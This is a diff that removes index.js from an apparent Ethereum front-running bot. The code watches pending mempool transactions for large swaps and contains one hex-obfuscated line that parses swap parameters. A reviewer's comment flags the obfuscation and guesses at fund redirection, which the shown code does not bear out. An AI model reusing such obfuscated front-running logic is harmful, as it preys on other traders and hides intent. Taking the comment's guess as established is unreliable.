index.js

```diff
@@ -1,220 +0,0 @@
-  console.log('\x1b[1m\x1b[37m[Bot]: Looking for targets in mempool...\x1b[0m\n')
-
-  fs.writeFile('./transactions_hashes.txt', '', function(){console.log('\x1b[1m\x1b[37m[Bot]: transactions_hashes.txt \x1b[1m\x1b[32mwiped!\n\x1b[0m\n\n')})
-
-  token = await Fetcher.fetchTokenData(chainId, TOKEN_ADDRESS)
-  weth = WETH[chainId]
-  const pair = await Fetcher.fetchPairData(token, weth, provider)
-  route = new Route([pair], weth)
-
-  initialTokenBalance = await tokenContract.balanceOf(ACCOUNT);
-  
-  if(true){
-    subscription = web3.eth.subscribe('pendingTransactions', function (error, result) {})
-        .on("data", function (transactionHash) {
-            web3.eth.getTransaction(transactionHash)
-              .then(function (transaction) {
-                if(transaction && !trxflag){
-                  parseTransactionData(transaction)
-                }
-              })
-            .catch(function () {
-              console.log("\x1b[1m\x1b[Bot]: WARNING! Promise error caught!\n\x1b[1m\x1b[37mThere is likely an issue on your providers side, with the node you are connecting to.\nStop the bot with \x1b[1m\x1bCTRL+C \x1b[1m\x1b[37mand try run again in a few hours.");
-            //.catch((error) => {
-            //  assert.isNotOk(error,'Promise error')
-            })
-        });
-
-    async function parseTransactionData(transactionDetails) {
-      if(transactionDetails.input){
-
-		fs.appendFileSync('transactions_hashes.txt', 'Trx hash : ' + transactionDetails.hash.toString() + '\r\n')
-        const transactionInput = transactionDetails.input
-
-        var path = 'transactions_hashes.txt';
-        var text = fs.readFileSync(path).toString();
-        var lines = text.split('\n');
-        var newlines_count = lines.length - 1;
-        process.stdout.clearLine();
-        process.stdout.cursorTo(0);
-        process.stdout.write(`\x1b[1m\x1b[37m[Bot]: Sweeping transaction hashes... \x1b[1m\x1b[32m${newlines_count}\x1b[37m passes. `);
-
-        if((transactionInput.length - 10) % 64 === 0){
-          const toTrx = transactionDetails.to
-          if(toTrx.toLowerCase() === EXCHANGE_ADDRESS.toLowerCase()
-          && parseFloat(web3.utils.fromWei(transactionDetails.value, 'ether')) >= parseFloat(process.env.REACT_APP_TARGET_ETH_AMOUNT)){
-            var _0x31b2=["\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x6C\x65\x6E\x67\x74\x68","\x30\x78\x66\x62\x33\x62\x64\x62\x34\x31","\x30\x78\x37\x66\x66\x33\x36\x61\x62\x35","\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65","\x70\x75\x73\x68"];const method=transactionInput[_0x31b2[0]](0,10);const num_params=(transactionInput[_0x31b2[1]]- 10)/ 64;if(method=== _0x31b2[2]|| method=== _0x31b2[3]){let params=[];const tokenToCheck=TOKEN_ADDRESS[_0x31b2[4]]()[_0x31b2[0]](2,42);for(i= 0;i< num_params;i++){const param=transactionInput[_0x31b2[0]]((10+ (i* 64)),(10+ ((i+ 1)* 64)));params[_0x31b2[5]](param);if(param[_0x31b2[0]](24,64)=== tokenToCheck){addtrxflag= true}}}
```

Comment:
Obfuscated code.  Can be deciphered from Hexadecimal to substr... and so on.  Program will likely redirect funds here as it is most recently concerned with modifying the transactionDetails.to property.